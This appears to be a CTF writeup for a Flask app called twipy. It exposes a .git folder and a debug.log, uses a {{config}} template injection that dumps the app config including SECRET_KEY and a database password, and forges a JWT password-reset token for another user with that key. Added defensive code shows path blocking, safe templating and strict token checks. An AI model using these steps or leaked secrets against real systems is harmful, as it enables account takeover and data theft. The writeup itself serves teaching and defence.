Last active: May 29, 2022 11:29
-- challenge 1:
From the name of the challenge it was a dead giveaway that there was a .git folder exposed.
Then just find out where the git repo is hosted:
curl http://0x70.apl3b.com/.git/config
And get the repo hosting service:
https://gitlab.com/DDuarte/twipy.git
Finally check all the commits; on this one, at the bottom of the page, you can read a flag:
https://gitlab.com/DDuarte/twipy/commit/508cc297eb2d5412a5f994e87a27b43ffbf033a4
{flag}Us3_vault_for_no_p4sswords_1n_s0urce_cod3.
-- challenge 2:
Just use dirsearch.py
or
search the repo for the word "debug". Again the hint from the challenge name helped here:
https://gitlab.com/search?utf8=%E2%9C%93&snippets=&scope=&search=debug&project_id=10269530
Get the file from the website and read the flag in the error messages:
http://0x70.apl3b.com/debug.log
{flag}b3_c4r3ful_w1th_Wh4t_y0u_l34v3_pUbl1c
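Challenges 1 and 2 share one root cause: files that belong to the repository or to debugging (.git/, debug.log) were left reachable under the web root. The fix is to keep them out of the deployed tree in the first place; as defence in depth, the application can also refuse such paths before any handler runs. The following is an added example for this writeup, not twipy code: a small WSGI middleware (Flask apps can be wrapped via app.wsgi_app = block_sensitive_paths(app.wsgi_app)); the denied-suffix list, the demo app and the call() helper are constructed for the demonstration.

```python
"""Refuse to serve repository and debug artefacts from a Python web app.

Added example for challenges 1 and 2 of this writeup; it is not twipy code.
The WSGI middleware, the denied suffix list and the demo app are assumptions
made for the demonstration.
"""

# Extensions that should never be reachable under the web root (constructed list).
DENIED_SUFFIXES = (".log", ".bak", ".swp", ".sql", ".orig")


def is_denied_path(path: str) -> bool:
    """True for any dot-segment (.git, .env, .svn, ..) or a denied suffix.

    PATH_INFO is already percent-decoded by the WSGI server, so an encoded
    '%2Egit' arrives here as '.git' and is caught as well.
    """
    segments = [s for s in path.split("/") if s]
    if any(s.startswith(".") for s in segments):
        return True
    return path.lower().endswith(DENIED_SUFFIXES)


def block_sensitive_paths(app):
    """Wrap a WSGI app; denied paths get a 404 before the app sees them."""
    def middleware(environ, start_response):
        if is_denied_path(environ.get("PATH_INFO", "")):
            body = b"Not Found"
            start_response("404 Not Found", [("Content-Type", "text/plain"),
                                             ("Content-Length", str(len(body)))])
            return [body]
        return app(environ, start_response)
    return middleware


def demo_app(environ, start_response):
    """Stand-in for the real application: serves anything it is asked for."""
    body = f"served {environ['PATH_INFO']}".encode()
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [body]


def call(app, path: str):
    """Drive a WSGI app with a minimal environ; returns (status, body text)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path, "wsgi.url_scheme": "http"}
    body = b"".join(app(environ, start_response))
    return captured["status"], body.decode()


if __name__ == "__main__":
    protected = block_sensitive_paths(demo_app)
    for p in ("/.git/config", "/debug.log", "/explore"):
        print(p, "->", call(protected, p))
```

The same rule belongs in front of the app as well (a reverse proxy that denies dot-segments), because a static file server in front of the WSGI layer would otherwise hand out .git/config without ever consulting the middleware.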
-- challenge 3:
Vulnerability: Server Side Template Injection (SSTI) jinja2/Flask
Some references:
https://ctftime.org/writeup/10895
https://eugenekolo.com/blog/hitcon-ctf-2016-writeups/
https://hackerone.com/reports/125980
Register a user on the website http://0x70.apl3b.com and create a private post with: {{config}}
Hint: don't use your real email --> OPSEC (un)safe debug.log ;)
You just posted: <Config {'JSON_AS_ASCII': True, 'BOOTSTRAP_LOCAL_SUBDOMAIN': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAIL_USERNAME': '[email protected]', 'SQLALCHEMY_POOL_RECYCLE': None, 'SQLALCHEMY_ECHO': "False", 'SQLALCHEMY_TRACK_MODIFICATIONS': "False", 'SQLALCHEMY_POOL_TIMEOUT': None, 'SQLALCHEMY_RECORD_QUERIES': None, 'SESSION_COOKIE_DOMAIN': "False", 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'BOOTSTRAP_QUERYSTRING_REVVING': True, 'MAIL_SERVER': 'smtp.gmail.com', 'SQLALCHEMY_NATIVE_UNICODE': None, 'MAX_CONTENT_LENGTH': None, 'MAIL_USE_TLS': "False", 'ELASTICSEARCH_URL': 'el:9200', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'SQLALCHEMY_POOL_SIZE': None, 'SQLALCHEMY_MAX_OVERFLOW': None, 'ADMINS': ['[email protected]'], 'TRAP_HTTP_EXCEPTIONS': "False", 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_COOKIE_PATH': None, 'BOOTSTRAP_SERVE_LOCAL': "False", 'SESSION_COOKIE_SAMESITE': None, 'SECRET_KEY': 'yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc=', 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'TESTING': "False", 'TEMPLATES_AUTO_RELOAD': None, 'JSONIFY_MIMETYPE': 'application/json', 'MAIL_USE_SSL': True, 'USE_X_SENDFILE': "False", 'SQLALCHEMY_DATABASE_URI': 'mysql+pymysql://twipy:RkZDwtkaZ9ugnwf@db/twipy', 'SESSION_COOKIE_SECURE': "False", 'POSTS_PER_PAGE': 8, 'BOOTSTRAP_USE_MINIFIED': True, 'SQLALCHEMY_BINDS': None, 'FLAG': '{flag}V4lid4t3_always_us3r_1NPUT', 'ENV': 'production', 'DEBUG': "False", 'SQLALCHEMY_COMMIT_ON_TEARDOWN': "False", 'EXPLAIN_TEMPLATE_LOADING': "False", 'MAIL_PASSWORD': None, 'JSONIFY_PRETTYPRINT_REGULAR': "False", 'BOOTSTRAP_CDN_FORCE_SSL': "False", 'PROPAGATE_EXCEPTIONS': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'MAIL_PORT': 465}>
{flag}V4lid4t3_always_us3r_1NPUT
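The post body leaks the whole config because the application compiles the user's text as a Jinja2 template instead of passing it to a fixed template as data; Flask exposes app.config to every template under the name config, which is why {{config}} alone is enough. The following is an added example for this writeup, not twipy code: the vulnerable pattern and the fixed one side by side, using the Jinja2 engine Flask itself uses. CONFIG is a constructed stand-in for app.config with a fake secret.

```python
"""Jinja2 server-side template injection: vulnerable pattern next to its fix.

Added example for challenge 3 of this writeup; not twipy code. CONFIG is a
constructed stand-in for Flask's app.config (Flask exposes app.config to every
template as `config`, which is why {{config}} dumps it).
"""
from jinja2 import Environment

CONFIG = {"SECRET_KEY": "constructed-demo-secret", "ENV": "production"}

# Autoescaping on, as Flask enables for HTML templates.
env = Environment(autoescape=True)


def render_post_vulnerable(body: str) -> str:
    """The bug: the user's text *is* the template, so its {{ }} expressions run.

    This is what render_template_string(body) does in Flask.
    """
    return env.from_string(body).render(config=CONFIG)


def render_post_safe(body: str) -> str:
    """The fix: the template is a fixed string written by the developer; the
    post is handed over as a variable, so it is only printed and escaped,
    never parsed for template syntax."""
    template = env.from_string("<p>{{ body }}</p>")
    return template.render(body=body)


def contains_secret(rendered: str) -> bool:
    """Helper for the demo: did the secret end up in the page?"""
    return CONFIG["SECRET_KEY"] in rendered


if __name__ == "__main__":
    payload = "{{config}}"
    print("vulnerable:", render_post_vulnerable(payload))
    print("safe      :", render_post_safe(payload))
```

The safe variant also answers the "validate user input" flag in a more robust way than filtering: there is no allow-list of characters to get wrong, because user text never reaches the template compiler at all.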
-- challenge 4:
Reset Willis's password by forging the password reset token, since we extracted the SECRET_KEY value from the app.
Get the password reset token format:
https://gitlab.com/DDuarte/twipy/blob/master/app/models.py#L111
Get Willis's email:
https://gitlab.com/DDuarte/twipy/blob/master/twipy.py#L14
Get the UUID of the user Willis:
http://0x70.apl3b.com/explore?page=25
Generate the password reset token:
pyenv global 2.7.15
pip install PyJWT
python
import jwt
import base64
from time import time
token = jwt.encode({'id': '70a82737-a6d9-4284-93db-0600db6f05ca', 'name': 'Willis Adams', 'email': '[email protected]', 'exp': time() + 600},base64.b64decode('yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc='),algorithm='HS256').decode('utf-8')
print(token)
quit()
Willis's password reset URL:
http://0x70.apl3b.com/auth/reset_password/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6IndpbGxpcy5hZGFtc0BleGFtcGxlLmNvbSIsImlkIjoiNzBhODI3MzctYTZkOS00Mjg0LTkzZGItMDYwMGRiNmYwNWNhIiwiZXhwIjoxNTQ3NzM1NjA0LjIzODk3MSwibmFtZSI6IldpbGxpcyBBZGFtcyJ9.wm73GeCyWRR2aCE_xXtsVkDnjiwVbput62sVe_V3JW0
See Willis's second private post:
{flag}4lw4ys_v3r1fy_y0ur_t0k3NS
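The forged token works because a reset token is only as strong as the key that signs it and the checks the server applies when it comes back. On the defending side that means: pin the algorithm, verify the signature before reading any claim, enforce expiry, and bind the token to state that changes on reset so it is single-use; a leaked SECRET_KEY, as in this challenge, is then contained by rotating the key, which invalidates every outstanding token. The following is an added example for this writeup, not twipy code: an HS256 issue/verify pair written with only the standard library (PyJWT does the same job in production). The claim names, the password-hash fingerprint scheme, the in-memory users table and the demo key are assumptions made for the demonstration.

```python
"""Password-reset tokens that are actually verified: HS256 JWT issue/verify
with only the standard library.

Added example for challenge 4 of this writeup; not twipy code. The claim
names, the fingerprint scheme, the users table and the key are assumptions.
"""
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def fingerprint(password_hash: str) -> str:
    # Short digest of the stored password hash; changes whenever the password does.
    return hashlib.sha256(password_hash.encode()).hexdigest()[:16]


def issue_reset_token(secret: bytes, user_id: str, password_hash: str,
                      now: int, ttl: int = 600) -> str:
    """Server-side issuance: sub = user, exp = now + ttl, pwd = fingerprint."""
    header = {"alg": "HS256", "typ": "JWT"}
    claims = {"sub": user_id, "exp": now + ttl, "pwd": fingerprint(password_hash)}
    parts = [b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
             for obj in (header, claims)]
    signing_input = ".".join(parts)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify_reset_token(token: str, secret: bytes, users: dict, now: int) -> Optional[str]:
    """Return the user id the token may reset, or None on any failure.

    users maps user id -> current password hash (constructed stand-in for the DB).
    """
    try:
        header_b64, claims_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        claims = json.loads(b64url_decode(claims_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:  # bad structure, bad base64 or bad JSON
        return None
    # 1. Pin the algorithm server-side; never honour what the token asks for.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    # 2. Check the signature (constant time) before trusting a single claim.
    expected = hmac.new(secret, f"{header_b64}.{claims_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        return None
    # 3. Expiry: exp must be an integer strictly in the future.
    exp = claims.get("exp") if isinstance(claims, dict) else None
    if not isinstance(exp, int) or isinstance(exp, bool) or exp <= now:
        return None
    # 4. Bind to the current password so a token is single-use and dies on reset.
    user_id = claims.get("sub")
    current_hash = users.get(user_id) if isinstance(user_id, str) else None
    if current_hash is None or not isinstance(claims.get("pwd"), str):
        return None
    if not hmac.compare_digest(fingerprint(current_hash).encode(), claims["pwd"].encode()):
        return None
    return user_id


if __name__ == "__main__":
    SECRET = b"constructed-demo-secret"
    users = {"user-1": "pbkdf2:sha256$old"}
    tok = issue_reset_token(SECRET, "user-1", users["user-1"], now=1000)
    print("valid   :", verify_reset_token(tok, SECRET, users, now=1100))
    print("rotated :", verify_reset_token(tok, b"rotated-key", users, now=1100))
    users["user-1"] = "pbkdf2:sha256$new"
    print("used    :", verify_reset_token(tok, SECRET, users, now=1100))
```

The password-hash binding is what makes the token single-use without a server-side blacklist: as soon as the reset succeeds the fingerprint no longer matches, so the same link cannot be replayed. The rotated-key case is the response to the leak in challenge 3: once SECRET_KEY is known to have left the server, changing it makes every token signed under the old value fail step 2.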